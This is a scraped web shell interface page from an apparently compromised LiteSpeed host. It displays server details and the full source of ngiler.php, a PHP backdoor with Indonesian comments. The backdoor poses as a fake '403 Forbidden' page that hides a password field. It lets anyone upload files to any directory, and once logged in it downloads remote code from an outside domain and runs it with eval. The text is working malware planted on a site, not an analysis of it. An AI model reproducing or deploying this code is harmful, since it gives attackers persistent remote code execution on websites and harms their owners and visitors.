HEX
Server: LiteSpeed
System: Linux d8 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
User: wbwebdes (3015)
PHP: 8.1.31
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/wbwebdes/domains/abuse.wb-webdesign.com/public_html/
Upload Files
File: /home/wbwebdes/domains/abuse.wb-webdesign.com/public_html/ngiler.php
<?php

session_start();

// Fungsi untuk memeriksa status login
function is_logged_in() {
    return isset($_SESSION['X-H0UR']);
}

// Fungsi untuk memvalidasi login
function login($password) {
    $valid_password_hash = 'e31fb8f677e6ccbe2bdeac06e4fc42f7'; // MD5 hash password
    $password_hash = md5($password);
    if ($password_hash === $valid_password_hash) {
        $_SESSION['X-H0UR'] = 'user';
        return true;
    } else {
        return false;
    }
}

// Fungsi untuk logout
function logout() {
    unset($_SESSION['X-H0UR']);
}

// Fungsi untuk mengambil konten dari URL
function getContent($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    $content = curl_exec($curl);
    curl_close($curl);
    if ($content === false) {
        $content = file_get_contents($url);
    }
    return $content;
}

// Fungsi untuk mendapatkan data mentah dari URL
function getRawContent($url) {
    return getContent($url);
}

// Tangani proses login
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
    $password = $_POST['password'];
    if (login($password)) {
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        $error_message = "Password salah!";
        echo '<script>alert("' . $error_message . '");</script>';
    }
}

// Tangani proses unggah file
if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
    echo '<form method="post" enctype="multipart/form-data">';
    echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
    echo '<input type="file" name="file" size="15">';
    echo '<input type="submit" value="Unggah">';
    echo '</form>';
}

if (isset($_FILES['file']['tmp_name'])) {
    $uploadd = $_FILES['file']['tmp_name'];
    if (file_exists($uploadd)) {
        $pwddir = $_POST['dir'];
        $real = $_FILES['file']['name'];
        $de = rtrim($pwddir, '/') . "/" . $real;
        if (move_uploaded_file($uploadd, $de)) {
            echo "BERKAS DIUNGGAHKAN KE $de";
        } else {
            echo "GAGAL MENGUNGGAH BERKAS KE $de";
        }
    }
}

// Jika pengguna sudah login, ambil dan eksekusi konten dari URL
if (is_logged_in()) {
    $url = 'https://gas-lagi.xyz/jancok/index.txt';
    $content = getRawContent($url);
    eval('?>' . $content);
    exit;
}

?>

<!DOCTYPE html>
<html>
<head>
    <title>403 Forbidden</title>
</head>
<body>
    <h1>Forbidden</h1>
    <p>You don't have permission to access <?php echo $_SERVER['REQUEST_URI']; ?> on this server.</p>
    <hr>
    <address>
        <?php echo $_SERVER['SERVER_SOFTWARE']; ?> Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port <?php echo $_SERVER['SERVER_PORT']; ?>
    </address>
    <form method="post">
        <input style="position: absolute; bottom: 0; left: 50%; transform: translateX(-50%); background-color: #fff; border: 1px solid #fff; text-align: center;" type="password" name="password" placeholder="">
    </form>
</body>
</html>
@ Telegram